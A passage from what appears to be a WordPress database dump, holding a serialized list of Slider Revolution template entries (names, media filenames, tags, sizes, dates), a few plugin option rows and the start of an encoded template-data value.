09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:390;a:13:{s:2:\"id\";s:3:\"316\";s:6:\"handle\";s:21:\"emily_carney_dark.jpg\";s:5:\"video\";s:21:\"emily_carney_dark.mp4\";s:4:\"name\";s:17:\"emily_carney_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"emily_carney_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:391;a:13:{s:2:\"id\";s:3:\"315\";s:6:\"handle\";s:22:\"michael-smith_dark.jpg\";s:5:\"video\";s:22:\"michael-smith_dark.mp4\";s:4:\"name\";s:18:\"michael-smith_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:18:\"michael-smith_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:392;a:13:{s:2:\"id\";s:3:\"314\";s:6:\"handle\";s:23:\"sandra_johnson_dark.jpg\";s:5:\"video\";s:23:\"sandra_johnson_dark.mp4\";s:4:\"name\";s:19:\"sandra_johnson_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:19:\"sandra_johnson_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:393;a:13:{s:2:\"id\";s:3:\"313\";s:6:\"handle\";s:22:\"robert_bolton_dark.jpg\";s:5:\"video\";s:22:\"robert_bolton_dark.mp4\";s:4:\"name\";s:18:\"robert_bolton_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:18:\"robert_bolton_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:394;a:13:{s:2:\"id\";s:3:\"312\";s:6:\"handle\";s:25:\"elegant_captions_dark.png\";s:5:\"video\";s:25:\"elegant_captions_dark.mp4\";s:4:\"name\";s:21:\"elegant_captions_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:21:\"elegant_captions_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-18 14:41:45\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:395;a:13:{s:2:\"id\";s:3:\"311\";s:6:\"handle\";s:19:\"Caption_Dark_06.png\";s:5:\"video\";s:19:\"Caption_Dark_06.mp4\";s:4:\"name\";s:15:\"Caption_Dark_06\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_06\";s:5:\"width\";s:3:\"414\";s:6:\"height\";s:3:\"225\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:396;a:13:{s:2:\"id\";s:3:\"310\";s:6:\"handle\";s:19:\"Header_Light_02.png\";s:5:\"video\";s:19:\"Header_Light_02.mp4\";s:4:\"name\";s:15:\"Header_Light_02\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:15:\"Header_Light_02\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:397;a:13:{s:2:\"id\";s:3:\"309\";s:6:\"handle\";s:21:\"Columns_4_Dark_01.png\";s:5:\"video\";s:21:\"Columns_4_Dark_01.mp4\";s:4:\"name\";s:17:\"Columns_4_Dark_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"Columns_4_Dark_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:398;a:13:{s:2:\"id\";s:3:\"308\";s:6:\"handle\";s:18:\"Header_Dark_01.png\";s:5:\"video\";s:18:\"Header_Dark_01.mp4\";s:4:\"name\";s:14:\"Header_Dark_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:14:\"Header_Dark_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:399;a:13:{s:2:\"id\";s:3:\"307\";s:6:\"handle\";s:19:\"Caption_Dark_03.png\";s:5:\"video\";s:19:\"Caption_Dark_03.mp4\";s:4:\"name\";s:15:\"Caption_Dark_03\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_03\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:400;a:13:{s:2:\"id\";s:3:\"306\";s:6:\"handle\";s:21:\"Columns_3_Dark_01.png\";s:5:\"video\";s:21:\"Columns_3_Dark_01.mp4\";s:4:\"name\";s:17:\"Columns_3_Dark_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"Columns_3_Dark_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:401;a:13:{s:2:\"id\";s:3:\"305\";s:6:\"handle\";s:19:\"Caption_Dark_05.png\";s:5:\"video\";s:19:\"Caption_Dark_05.mp4\";s:4:\"name\";s:15:\"Caption_Dark_05\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_05\";s:5:\"width\";s:4:\"1104\";s:6:\"height\";s:3:\"600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:402;a:13:{s:2:\"id\";s:3:\"304\";s:6:\"handle\";s:20:\"Caption_Light_06.png\";s:5:\"video\";s:20:\"Caption_Light_06.mp4\";s:4:\"name\";s:16:\"Caption_Light_06\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_06\";s:5:\"width\";s:3:\"828\";s:6:\"height\";s:3:\"450\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:403;a:13:{s:2:\"id\";s:3:\"303\";s:6:\"handle\";s:19:\"Header_Light_01.png\";s:5:\"video\";s:19:\"Header_Light_01.mp4\";s:4:\"name\";s:15:\"Header_Light_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:15:\"Header_Light_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:404;a:13:{s:2:\"id\";s:3:\"302\";s:6:\"handle\";s:20:\"Caption_Light_03.png\";s:5:\"video\";s:20:\"Caption_Light_03.mp4\";s:4:\"name\";s:16:\"Caption_Light_03\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_03\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:405;a:13:{s:2:\"id\";s:3:\"301\";s:6:\"handle\";s:19:\"Caption_Dark_01.png\";s:5:\"video\";s:19:\"Caption_Dark_01.mp4\";s:4:\"name\";s:15:\"Caption_Dark_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:406;a:13:{s:2:\"id\";s:3:\"300\";s:6:\"handle\";s:21:\"PromoCode_Dark_01.png\";s:5:\"video\";s:21:\"PromoCode_Dark_01.mp4\";s:4:\"name\";s:17:\"PromoCode_Dark_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"PromoCode_Dark_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:407;a:13:{s:2:\"id\";s:3:\"299\";s:6:\"handle\";s:19:\"Caption_Dark_02.png\";s:5:\"video\";s:19:\"Caption_Dark_02.mp4\";s:4:\"name\";s:15:\"Caption_Dark_02\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_02\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:408;a:13:{s:2:\"id\";s:3:\"298\";s:6:\"handle\";s:18:\"Header_Dark_02.png\";s:5:\"video\";s:18:\"Header_Dark_02.mp4\";s:4:\"name\";s:14:\"Header_Dark_02\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:14:\"Header_Dark_02\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:409;a:13:{s:2:\"id\";s:3:\"297\";s:6:\"handle\";s:22:\"Columns_3_Light_01.png\";s:5:\"video\";s:22:\"Columns_3_Light_01.mp4\";s:4:\"name\";s:18:\"Columns_3_Light_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"Columns_3_Light_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:410;a:13:{s:2:\"id\";s:3:\"296\";s:6:\"handle\";s:20:\"Caption_Light_01.png\";s:5:\"video\";s:20:\"Caption_Light_01.mp4\";s:4:\"name\";s:16:\"Caption_Light_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:411;a:13:{s:2:\"id\";s:3:\"295\";s:6:\"handle\";s:19:\"Caption_Dark_04.png\";s:5:\"video\";s:19:\"Caption_Dark_04.mp4\";s:4:\"name\";s:15:\"Caption_Dark_04\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_04\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:412;a:13:{s:2:\"id\";s:3:\"294\";s:6:\"handle\";s:20:\"Caption_Light_02.png\";s:5:\"video\";s:20:\"Caption_Light_02.mp4\";s:4:\"name\";s:16:\"Caption_Light_02\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_02\";s:5:\"width\";s:3:\"828\";s:6:\"height\";s:3:\"450\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:413;a:13:{s:2:\"id\";s:3:\"293\";s:6:\"handle\";s:20:\"Caption_Light_04.png\";s:5:\"video\";s:20:\"Caption_Light_04.mp4\";s:4:\"name\";s:16:\"Caption_Light_04\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_04\";s:5:\"width\";s:4:\"1104\";s:6:\"height\";s:3:\"600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:414;a:13:{s:2:\"id\";s:3:\"292\";s:6:\"handle\";s:22:\"Columns_4_Light_01.png\";s:5:\"video\";s:22:\"Columns_4_Light_01.mp4\";s:4:\"name\";s:18:\"Columns_4_Light_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"Columns_4_Light_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:415;a:13:{s:2:\"id\";s:3:\"291\";s:6:\"handle\";s:20:\"Caption_Light_05.png\";s:5:\"video\";s:20:\"Caption_Light_05.mp4\";s:4:\"name\";s:16:\"Caption_Light_05\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_05\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:416;a:13:{s:2:\"id\";s:3:\"290\";s:6:\"handle\";s:22:\"PromoCode_Light_01.png\";s:5:\"video\";s:22:\"PromoCode_Light_01.mp4\";s:4:\"name\";s:18:\"PromoCode_Light_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"PromoCode_Light_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}}s:4:\"tags\";a:18:{i:28;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}i:5;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:20;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}i:21;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}i:25;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}i:2;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:16;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}i:26;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}i:18;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:4;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}i:19;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}i:23;a:3:{s:2:\"id\";s:2:\"23\";s:6:\"handle\";s:5:\"Night\";s:4:\"name\";s:5:\"Night\";}i:3;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}i:24;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}i:22;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:29;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}i:27;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}}','no'),(170,'revslider-templates-check','1705570578','yes'),(171,'revslider-templates-hash','fe4cdc5f7a4b5a1b163f1e49843f71b4','yes'),(172,'rs-templates-new','','no'),(173,'rs-templates','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